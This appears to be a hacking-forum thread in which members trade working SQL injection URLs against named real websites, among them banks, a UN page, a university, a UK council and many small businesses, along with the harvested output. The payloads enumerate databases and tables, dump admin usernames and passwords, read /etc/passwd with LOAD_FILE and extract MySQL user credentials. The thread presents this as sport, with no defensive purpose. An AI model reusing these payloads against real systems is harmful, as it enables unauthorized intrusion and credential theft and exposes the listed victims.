Code: http://www.rukodelie.ru/index.php?page=cart&lastid=1+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 @localhost | 5.0.26-lk-log | rukodelier | pc-linux-gnu
Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29-- Database name: News Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29-- Owner: web Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version-- Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) Now the tables and columns Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29-- One of the tables: failedemails
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null-- http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1-- http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19-- version(): 4.0.27-standard user(): dbo273434928@localhost database(): db273434928 There is also an admin table (+ admin panel http://www.arctic-cooling.com/admin)
5.0.81-log:shansco_shans:[email protected]:unknown-linux-gnu Databases Code: nformation_schema@shansco_forum@shansco_shans tables Code: documents@news@news_copy@numbers@pages@poll_comment@poll_config@poll_data@poll_index@poll_ip@poll_log@poll_templates@poll_templateset@poll_user@rec_banners@rec_compact@rec_compact_tmp@rec_date@rec_firm@rec_firm_block@rec_firm_name@rec_firm_tmp@rec_private@rec_private_tmp@rec_rubric@rubrics@sav_que forum tables Code: phpbb_attach_quota@phpbb_attachments@phpbb_attachments_config@phpbb_attachments_desc@phpbb_auth_access@phpbb_banlist@phpbb_categories@phpbb_config@phpbb_confirm@phpbb_disallow@phpbb_extension_groups@phpbb_extensions@phpbb_forbidden_extensions@phpbb_forum_prune@phpbb_forums@phpbb_groups@phpbb_posts@phpbb_posts_text@phpbb_privmsgs@phpbb_privmsgs_text@phpbb_quota_limits@phpbb_ranks@phpbb_search_results@phpbb_search_wordlist@phpbb_search_wordmatch@phpbb_sessions@phpbb_sessions_keys@phpbb_smilies@phpbb_themes@phpbb_themes_name@phpbb_topics@phpbb_topics_watch@phpbb_user_group@phpbb_users@phpbb_vote_desc@phpbb_vote_results@phpbb_vote_voters@phpbb_words poll_user: Code: user_id@username@userpass@session@last_visit poll_log Code: log_id@poll_id@option_id@timestamp@ip_addr@host@agent Code: http://shans.com.ua/index.php?m=nr&id=-6421+union+select+1,2,group_concat(concat_ws(0x3a,username,userpass,last_visit)%20separator%200x3a)+from+poll_user--+&in=60 the admin panel and the forum are in the following directories, respectively:
Code: http://www.karlson-e.ru/?page=product&dir=-1%27+and+1=1+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,8,9+--+ webuser@localhost 5.1.34-log karlson portbld-freebsd7.1
MySQL 4 http://www.digitalflywheel.com/case.php?id=-4+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,0x3a,password)+from+users+limit+1,1 MySQL 4.0.27-log users::username,password http://www.digitalflywheel.com/admin
Bank )) Code: http://www.fidelitybank.com.gh/management/details.php?id=-1+union+select+1,2,3,4,5,6,7-- Database: Version : 4.1.22-standard-log User: [email protected] OS: pc-linux-gnu
shell_c0de's idea Bank )) concerns_stella@localhost@[email protected] akciaban_bank@localhost@[email protected]@unknown-linux-gnu Event: bank_sparhafen@localhost:5.0.37-community-nt:bank_sparhafen:Win32 other 65 columns inforesipps@localhost:inforesipps:4.1.25-logortbld-freebsd6.3
http://www.ak-cent.kz/news?news_category=-1+union+select+1,2,3,4,5,6,7 akcentk_user@localhost 5.0.77-community akcentk_cms unknown-linux-gnu
Code: http://delemont.com.au/description.php?intProductID=71%27+and+substring%28@@version,1,1%29=%274 http://www.moretonisland.com.au/product.php?id=67768+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
the classic variant was blocked!!! 8055@localhost:8055:5.0.77:redhat-linux-gnu1 atto@localhost:atto_new:4.1.22-logortbld-freebsd6.2
Database Version: 5.0.81-community Database name: murzifan_helpstudents User name: murzifan_murzifa@localhost Database Version: 4.0.15-nt Database name: mgounb User name: root@localhost
Code: http://www.kuroed.com/?id=-1+and+1=1+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15+--+ kuroed@localhost kuroed1db 4.1.22-log portbld-freebsd6.3
MySQL 5: www.johnsoncitypress.com Code: http://www.johnsoncitypress.com/News/article.php?ID=71327'+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,user_name,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21+from+ClinchFestStore.wp_users+limit+0,1+--+ www.sewe.com Code: http://www.sewe.com/gallery.php?id=9+and+1=2+union+select+1,2,3,4,5,6,7,group_concat%28column_name%29,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+--+ www.365gunspor.com Code: http://www.365gunspor.com/unluler/picture.php?id=34%29+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,userbane,password%29%29+from+sporadmin+--+ www.faithwriters.com Code: http://www.faithwriters.com/wc-article-editors-previous.php?id=31730%27+and+7=9+union+select+1,2,3,4,5,group_concat%28concat_ws%280x3a,username,password%29%29,7,8,9,10+from+adminpass+--+ www.talkofnewyork.com Code: http://www.talkofnewyork.com/cool2us/cool.php?ID=396+and+1=2+union+select+1,2,3,concat_ws%280x3a,id,username,password%29,5,6,7,8+from+admin+limit+0,1+--+ www.hoylegaming.com Code: http://www.hoylegaming.com/game.php?id=18+and+2=1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23,24+from+admin_users+--+ soccerladuma.mobi Code: http://soccerladuma.mobi/news.php?id=21263+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,fullname,email,passw,status%29%29,4,5,6,7,8+from+admin-- www.open.ac.uk Code: http://www.open.ac.uk/picetl/news/details/detail.php?itemId=496ddbbb661f5%27+and+1=2+union+select+1,2,3,4,5,6,concat_ws%28CHAR%2858,58%29,%20username,%20password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+SecurityCmsUser+limit+0,1/* www.rockfreaks.net Code: http://www.rockfreaks.net/index.php?page=albumreviews&id=-2398+union+select+1,table_schema,3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=CHAR%2898,95,117,115,101,114,115%29 www.rmmedia.ru Code: 
http://www.rmmedia.ru/news.php?id=48+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5+from+admin_audioshare.administrators-- www.yourlistonline.com Code: http://www.yourlistonline.com/news.php?id=29%27+and+1=2+union+select+1,2,3,group_concat%28concat_ws%280x3a,userName,password%29%29,5,6+from+a_users+--+ www.milim.com Code: http://www.milim.com/news.php?id=100+and+1=2+union+select+1,2,3,4,5,6,group_concat%28concat_ws%280x3a,column_name%29%29,8+from+information_schema.columns+where+table_name=0x62625f7573657273+--+ www.cloudveil.com Code: http://www.cloudveil.com/company/news.php?id=50+and+1=11+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13+from+information_schema.tables+--+ www.darksidefreefly.com Code: http://www.darksidefreefly.com/news.php?id=3+and+1=2+union+select+1,2,3,4,5,group_concat%28table_name%29+from+information_schema.tables-- www.activeodds.info Code: http://www.activeodds.info/news.php?id=5445+and+1=2+union+select+1,2,group_concat%28table_name%29,4,5+from+information_schema.tables-- www.mikealstottfamilyfoundation.org Code: http://www.mikealstottfamilyfoundation.org/news.php?id=19%27+and+1=2+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8+from+information_schema.tables+--+ MySQL 4: www.cssdownunder.com Code: http://www.cssdownunder.com/site.php?id=345+and+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10+--+ epodsolar.com Code: http://epodsolar.com/site.php?id=340+and+1=2+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
Continuing the tradition of banks ) a large American bank Code: http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5-- User: mcsbnhc_ensky@localhost Version: 4.1.22-standard Database: mcsbnhc_mcsb OS: linux-gnu
Code: http://www.lamsade.dauphine.fr/members.php?id_person=-151+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15-- Code: http://www.budd-marseille.fr/news.php?ID=-13+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* Code: http://www.avem.fr/news.php?id=-0148+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 4.0.25-standard-log:avemlfod:[email protected] Code: http://www.akata.fr/news.php?id=-449+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9 4.0.26-standard-log:akatav2:[email protected] Code: http://www.lephotographe.fr/news/news.php?id=-232+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13-- [email protected]:lephotographe:4.1.22-log
torreabbey@localhost:5.0.45:torreabbey Code: http://www.torre-abbey.org.uk/news.php?nID=-21+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4-- db_dentuser@lxplesk223:5.0.45:dentistry_content Code: http://www.dentistry.co.uk/news/news_detail.php?id=2434+limit+0+UnIon(SelecT+1,coNcaT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26)+--+ nanoorg_news@localhost:5.0.83-log:nanoorg_news Code: http://www.nano.org.uk/news/index.php?article=-319+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- council@localhost:4.1.8-nt-max-log:dev_cms Code: http://www.thurrock.gov.uk/news/content.php?page=story'+limit+0+union+select+1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&ID=3530
http://thehamsterwheel.net Code: http://thehamsterwheel.net/game-reviews.php?id=-33'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ http://www.theatrealive.com.au Code: http://www.theatrealive.com.au/reviews.php?id=-476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,firstname,lastname,pwd,user_level),12,13,14,user(),16,17,18,19,20,21,22,23,24+from+users+where+user_level=1+limit+2,1+/*+ http://tformers.com Code: http://tformers.com/article.php?sid=-12873+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+1,1+--+ www.gamesnewsi.com Code: http://www.gamesnewsi.com/reviews.php?op=showcontent&id=-751+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+5,1+--+ www.arscars.com Code: http://www.arscars.com/reviews.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name)+from+information_schema.tables+--+ www.americandreamcomics.com Code: http://www.americandreamcomics.com/reviews.php?op=showcontent&id=-1105+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+0,1+--+ www.clubfandango.co.uk Code: http://www.clubfandango.co.uk/reviews.php?id=-2198+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x77705F7573657273+--+ beerdorks.com Code: http://beerdorks.com/reviews.php?rev_id=-484+union+select+1,2,concat_ws(0x3a3a,user_login,user_password),4,5,6,7,8,9,10,11,12,13+from+users+--+ www.hollies.co.uk Code: http://www.hollies.co.uk/review/reviewindex.php?menu=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&st=1 benua.com.ua Code: http://benua.com.ua/reviews.php?id=-11+union+select+1,2,concat_ws(0x3a3a,login,pass,status),4+from+clients+--+ www.e-stat.info Code: 
http://www.e-stat.info/?cat=-16'+union+select+1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+group+by+table_schema+--+ www.beelingua.com Code: http://www.beelingua.com/reviews.php?id=-1+union+select+1,concat_ws(0x3a3a,id,l_user,l_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+l_admin+--+ www.best-savings-rates.com Code: http://www.best-savings-rates.com/reviews.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11,12+from+users+--+ www.winesellersltd.com Code: http://www.winesellersltd.com/reviews.php?id=-10+union+select+concat_ws(0x3a3a,user_name,password),2,3,4,5+from+users+limit+2,10+--+ www.the-junkyard.net Code: http://the-junkyard.net/reviews.php?action=viewreview&id=-32'+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+limit+0,1+--+ www.surclaro.com Code: http://www.surclaro.com/reviews.php?op=showcontent&id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+ www.hardwareheaven.com Code: http://www.hardwareheaven.com/reviews.php?reviewid=588&pageid=-1'+UnioN+SElect+1+from+authors+--+ www.metalfan.nl Code: http://www.metalfan.nl/reviews.php?id=-5491+union+select+1,concat_ws(0x3a3a,user_id,username,user_password,user_level)+from+mf_users+where+user_level=5+/*+
MySQL 5.0.87-community-log http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,column_name),24+from+information_schema.columns+where+table_name=0x7573657273+-- users::user_id,user_login,user_password,user_description,user_level http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,user_id,0x3a,user_login,0x3a,user_password),24+from+users+-- http://pravoinvest.com.ua:2082/login/
Hi all, I haven't been here for a long time. It was written that HL stats ones are a no, but I'll venture anyway. Engine: HLstatsX Community Edition 1.6.5 http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4--&game=css Version: 5.0.45-log User: [email protected] Database: hlstatsce Reading: etc/passwd http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764), 0x3a),4--&game=css root from MySQL http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,user,password),4+from+mysql.user--&game=css Sorry if anything is wrong.